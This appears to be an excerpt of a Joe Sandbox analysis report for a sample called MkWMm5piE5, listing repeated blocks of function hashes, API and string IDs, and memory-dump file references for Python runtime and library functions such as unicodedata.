                                                                                                                                                                                                                                                                          • Opcode ID: ee343125aa57c54faf244a34e48bc46db9da3b9588f8e1c1ef8b5bbee5cf8946
                                                                                                                                                                                                                                                                          • Instruction ID: 4055ed389e868e000cdac4a3c0b916794ac34f2ee91e8929e6d4d73f8471d68d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee343125aa57c54faf244a34e48bc46db9da3b9588f8e1c1ef8b5bbee5cf8946
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D721D275A09B4285FA619F95B8501BC63A5AF04B98F4C8437C90D87F70FFBEA1548340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                                                                          • String ID: <module>
                                                                                                                                                                                                                                                                          • API String ID: 4195104747-217463007
                                                                                                                                                                                                                                                                          • Opcode ID: ecdd50443da1972dac5f7d239e36a52e9dfd88a895bebb8cd24304ee5dc28952
                                                                                                                                                                                                                                                                          • Instruction ID: ed17d43cd04508bebbfa3f13a8defc37a3f83829f91ea98bbc28b3324622dfda
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecdd50443da1972dac5f7d239e36a52e9dfd88a895bebb8cd24304ee5dc28952
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B121B275E09B0685FA259F91B8541BC23A5AF05B99F4C8837C90D87B70FFBFA5548340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                                                                          • String ID: <module>
                                                                                                                                                                                                                                                                          • API String ID: 4195104747-217463007
                                                                                                                                                                                                                                                                          • Opcode ID: e4eff726a2b882ab3716e79be69498aa5b1f0e510f484dcc5ac300c35e7575a4
                                                                                                                                                                                                                                                                          • Instruction ID: 43b7c16c0ee396ac4d3ec76002a7bfa4d43a22c04dd4ccc017d8fba3d05518c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4eff726a2b882ab3716e79be69498aa5b1f0e510f484dcc5ac300c35e7575a4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5021DF75E09B0789FA259FA1B8505BC22A5BF05B98F4C8437C90D87A70FFBEA510C380
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$AttrObject_PackTuple_
                                                                                                                                                                                                                                                                          • String ID: <module>
                                                                                                                                                                                                                                                                          • API String ID: 4195104747-217463007
                                                                                                                                                                                                                                                                          • Opcode ID: a16e5229b7237972c2ee806c9dd78c651fb2e9dfacde5010816b5e6c7d31e686
                                                                                                                                                                                                                                                                          • Instruction ID: ac17bff45af7ca9a7c4f5576d02a388b40fc12b6fc344b799d6af040fc075828
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a16e5229b7237972c2ee806c9dd78c651fb2e9dfacde5010816b5e6c7d31e686
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D221DF65E09B0785FA648F91A9505BC23A5BF44B98F4C8437D94D87A70FFBEA514C340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596766588.00007FFEDCEDD000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE2000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEE8000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596783848.00007FFEDCEF0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedce30000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: O_indentO_printf
                                                                                                                                                                                                                                                                          • String ID: %s=0x%x (%s)$cookie$server_version
                                                                                                                                                                                                                                                                          • API String ID: 1860387303-2821402668
                                                                                                                                                                                                                                                                          • Opcode ID: 327565793ca1c70e8e8da8d0183750875db6904d42ff28b73fd3c334f791fb44
                                                                                                                                                                                                                                                                          • Instruction ID: 86a612385c54637534f7ab1d9f316d9dafbe5895c483ec27c0c7850972011a77
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 327565793ca1c70e8e8da8d0183750875db6904d42ff28b73fd3c334f791fb44
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B311B2A2A9C68141E6119B1DEC040BDB652EB807E4F9C4633DD6D67AF0DE3CE683C314
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
                                                                                                                                                                                                                                                                          • String ID: not a decimal
                                                                                                                                                                                                                                                                          • API String ID: 3750391552-3590249192
                                                                                                                                                                                                                                                                          • Opcode ID: 0cf26f43277d2d65cd436f04c55e3f115854bb953c5d4c83dfc8717dffaf923a
                                                                                                                                                                                                                                                                          • Instruction ID: 73b54b2fc8b9b7e3d315745c2569083c8714c7e57a5beb6af67dc2082014adbe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cf26f43277d2d65cd436f04c55e3f115854bb953c5d4c83dfc8717dffaf923a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38114221BC968281EB559B1EEC5413D72A1AF84BD4F5C4837D94E87EF8EF2CE8528300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                                                          • String ID: a unicode character$argument 1$decimal
                                                                                                                                                                                                                                                                          • API String ID: 3876575403-2474051849
                                                                                                                                                                                                                                                                          • Opcode ID: 9348c28e7ebcd46bb31e1bfa83ec9fe388dc58031527a9d4dedc035c740255b6
                                                                                                                                                                                                                                                                          • Instruction ID: f1bd8572e00872757eda27dcd085381291fe91d37dd1006879424e18c4e87f5e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9348c28e7ebcd46bb31e1bfa83ec9fe388dc58031527a9d4dedc035c740255b6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32114621B88A8295EA509F0AE8401AE7360EB44BC4F9C8433DA1D57BB9DE3CE597C300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                                                          • String ID: a unicode character$argument 1$numeric
                                                                                                                                                                                                                                                                          • API String ID: 3876575403-2385192657
                                                                                                                                                                                                                                                                          • Opcode ID: 52c217464d75848053b49b711c04e020a7b03085db03b8c2e29089cfeafef3ec
                                                                                                                                                                                                                                                                          • Instruction ID: f294eeb237db5112a08a313a10595f8b6210d93dc9b2ceac123dd634d8767c26
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52c217464d75848053b49b711c04e020a7b03085db03b8c2e29089cfeafef3ec
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1115832B48A9295EA509F5AEC401AD6361EB44BC4F5C8033EA1D47BB9DE3CE597C700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                                                                          • String ID: a unicode character$argument 1$name
                                                                                                                                                                                                                                                                          • API String ID: 3876575403-4190364640
                                                                                                                                                                                                                                                                          • Opcode ID: 3b9125b5b1efe8070f8bfaa69a26c5d9a925344cea38a0d903252173c94026c9
                                                                                                                                                                                                                                                                          • Instruction ID: 857b3f22723549521a149126b144b4a544b711aebde5ce9829e12f0518e265ee
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b9125b5b1efe8070f8bfaa69a26c5d9a925344cea38a0d903252173c94026c9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA115E31B48A9295EB509F5AE9811AD63A0EB44BC8F5C4033EA1D53BA9DF3CD557C300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: DeallocDict_ItemPackTuple_
                                                                                                                                                                                                                                                                          • String ID: <module>$>
                                                                                                                                                                                                                                                                          • API String ID: 4228545439-4024159097
                                                                                                                                                                                                                                                                          • Opcode ID: 4e122b1be13b90b9fde975fa5c7cafe2c707fcb1664262955b8b1ef10f53763c
                                                                                                                                                                                                                                                                          • Instruction ID: d99386bbec83748a3be3d6fcb6094b181d8e73409d88bbff6e24d0e19159991c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e122b1be13b90b9fde975fa5c7cafe2c707fcb1664262955b8b1ef10f53763c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B011A76E09A0381FB365B55E85067D2261AF40BA9F4C4437CA0D87BB0FEBFA4818301
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                                                                          • String ID: a unicode character$argument$combining
                                                                                                                                                                                                                                                                          • API String ID: 3979797681-4202047184
                                                                                                                                                                                                                                                                          • Opcode ID: 0010389201683798248f81cc769f89e95aab19bcf9dbd2fef4c49c29bb1cbe83
                                                                                                                                                                                                                                                                          • Instruction ID: c219e7c7ef95b291c65522e97cf9f2b0c0deddf6d6fbf05baddebf131794af8e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0010389201683798248f81cc769f89e95aab19bcf9dbd2fef4c49c29bb1cbe83
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5015A61F88A4282EA249B1DAC501BE22A0BF0D7D8F880633D94D47AE5DE3CE5978300
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Arg_ArgumentErr_Occurred
                                                                                                                                                                                                                                                                          • String ID: a unicode character$argument$mirrored
                                                                                                                                                                                                                                                                          • API String ID: 3979797681-4001128513
                                                                                                                                                                                                                                                                          • Opcode ID: ea2d28226fddc5d11e335db1b9ed7ab3f9b437e3c69b8b684c3fa5e494c2232a
                                                                                                                                                                                                                                                                          • Instruction ID: cc69b423758dafd3050a2541339bd4cc967633df49ce6e2d1a423551015e2042
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea2d28226fddc5d11e335db1b9ed7ab3f9b437e3c69b8b684c3fa5e494c2232a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B601BC61F88A4381EA248B1DAC401BD22A0BF487D4F58063BDA4D53AF8DF3CE2968304
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Mem_$Capsule_Err_FreeMallocMemory
                                                                                                                                                                                                                                                                          • String ID: unicodedata._ucnhash_CAPI
                                                                                                                                                                                                                                                                          • API String ID: 3673501854-3989975041
                                                                                                                                                                                                                                                                          • Opcode ID: 5e9834a627ee6fe7d10ad507bd7f89f40610d90c00d7e2fed1f02445e86e63e1
                                                                                                                                                                                                                                                                          • Instruction ID: 58fdc30e17d5ea2ca3d494c944142024b5ea95d9ee97a46fa1ad9ddaad615bfe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e9834a627ee6fe7d10ad507bd7f89f40610d90c00d7e2fed1f02445e86e63e1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EF0C921B99B8695EA068B59EC5417D73A4BF487D4B4C1433D94E06BF4FE3CE056C310
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596683141.00007FFEDCE31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFEDCE30000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596666996.00007FFEDCE30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596683141.00007FFEDCEB3000.00000020.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596741686.00007FFEDCEB5000.00000002.00000001.01000000.00000011.sdmpDownload File
